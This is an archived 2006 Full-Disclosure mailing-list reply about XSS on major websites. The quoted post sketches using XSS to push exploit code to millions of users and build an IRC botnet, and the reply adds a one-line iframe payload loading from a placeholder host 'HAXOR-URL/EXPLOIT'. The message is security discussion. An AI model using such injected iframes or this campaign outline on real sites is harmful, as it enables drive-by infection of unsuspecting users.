Re: [Full-disclosure] Do world's famous companies take care of theirsecurity?
- From: "Morning Wood" <se_cur_ity@xxxxxxxxxxx>
- Date: Mon, 31 Jul 2006 11:45:45 -0700
Does anybody happen to realize that XSS vulnerabilities make it simpler to
leverage other vulnerabilities? I mean, credential stealing is only the
beginning. Try loading WMF/JPEG/DCOM/AJAX/etc exploit code using an XSS
vulnerability on PayPal/Yahoo/Amazon/etc, sending the link off to millions
of people, and receiving several thousand bots to your IRC channel.
yes! all pray to <iframe src=http://HAXOR-URL/EXPLOIT></iframe>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- References:
- Prev by Date: Re: [Full-disclosure] n3td3v please shutup, please shutup.
- Next by Date: [Full-disclosure] Re: [EEYEB-20060227] D-Link Router UPNP Stack Overflow
- Previous by thread: Re: [Full-disclosure] Do world's famous companies take care of their security?
- Next by thread: [Full-disclosure] office 2007 testdrive
- Index(es):
